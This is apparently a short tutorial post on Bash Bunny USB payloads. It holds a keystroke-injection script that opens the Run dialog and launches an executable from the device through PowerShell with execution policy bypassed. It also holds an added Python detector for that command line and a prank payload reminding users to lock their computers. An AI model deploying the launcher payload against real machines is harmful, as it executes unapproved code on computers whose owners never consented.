bashbunny

2019-10-25  黑小柴

In HID STORAGE mode the device is recognized as a USB flash drive

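The string after Q STRING cannot be very long; if a long string is needed, declare it as a string variable.
The following example is written for a Chinese input method.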

LED SETUP
ATTACKMODE HID STORAGE
GET SWITCH_POSITION

LED ATTACK
# Run tst.exe from the BashBunny storage volume, located by its volume label
powershell="Powershell -nop -ex Bypass .((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\switch1\tst.exe')"

#RUN WIN Powershell -nop -ex Bypass  ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\tst.exe')"

Q GUI r
Q DELAY 150
# SHIFT toggles the Chinese input method to English input before typing
Q SHIFT
Q DELAY 150
Q STRING $powershell
Q ENTER

LED G 0
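
From the defender's side, the launcher typed by the payload above leaves a recognizable process command line: PowerShell started with the execution policy relaxed while resolving a volume by its label. The following Python check is an added example, not part of the original post; the function names are hypothetical and every sample command line except the first is constructed.

```python
import re

# WMI/CIM lookup of a volume by its label, as in the launcher string above.
VOLUME_BY_LABEL = re.compile(
    r"\b(gwmi|get-wmiobject|gcim|get-ciminstance)\s+win32_volume\b.*?\blabel\s*=",
    re.IGNORECASE,
)

def is_param(token, full_name, min_len, aliases=()):
    """True if token abbreviates -<full_name> the way powershell.exe accepts it."""
    if not token.startswith(("-", "/")):
        return False
    name = token[1:].lower()
    return name in aliases or (len(name) >= min_len and full_name.startswith(name))

def indicators(cmdline):
    """Return the launcher traits present in one process command line."""
    tokens = cmdline.split()
    found = set()
    if not tokens or "powershell" not in tokens[0].lower():
        return found
    for i, tok in enumerate(tokens):
        if is_param(tok, "noprofile", 3):
            found.add("no_profile")
        nxt = tokens[i + 1].lower() if i + 1 < len(tokens) else ""
        if is_param(tok, "executionpolicy", 2, ("ep",)) and nxt in ("bypass", "unrestricted"):
            found.add("policy_bypass")
    if VOLUME_BY_LABEL.search(cmdline):
        found.add("volume_by_label")
    return found

def is_removable_launcher(cmdline):
    """Flag PowerShell that relaxes execution policy and resolves a drive by label."""
    return {"policy_bypass", "volume_by_label"} <= indicators(cmdline)

# Sample process command lines (as logged by Event ID 4688 or Sysmon Event ID 1).
# The first is the string typed by the payload above; the rest are constructed.
SAMPLES = [
    r"Powershell -nop -ex Bypass .((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\switch1\tst.exe')",
    r"powershell.exe -NoProfile -ExecutionPolicy Bypass & ((Get-WmiObject Win32_Volume -Filter 'Label=''DATA''').Name+'tools\sync.exe')",
    r"powershell.exe -NoProfile -File C:\Scripts\inventory.ps1",
    r"powershell -Command Get-WmiObject Win32_Volume | Select-Object Name,Label",
]

if __name__ == "__main__":
    for line in SAMPLES:
        print(is_removable_launcher(line), sorted(indicators(line)))
```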

In HID mode the device is recognized as a human interface device

LED B G 100
msg_header="begining"
msg_body="I will learn to lock my computer"
msg_body_repeats=10
msg_end="Please remember to lock your computer when you walk away."

ATTACKMODE HID
Q GUI r
Q DELAY 150
Q STRING notepad.exe
Q ENTER
LED B 500

Q DELAY 200
Q STRING $msg_header
Q ENTER

for (( i=1; i<=$msg_body_repeats; i++ ))
do
   Q STRING $msg_body
   Q ENTER
done
Q STRING $msg_end
Q ENTER
LED G 0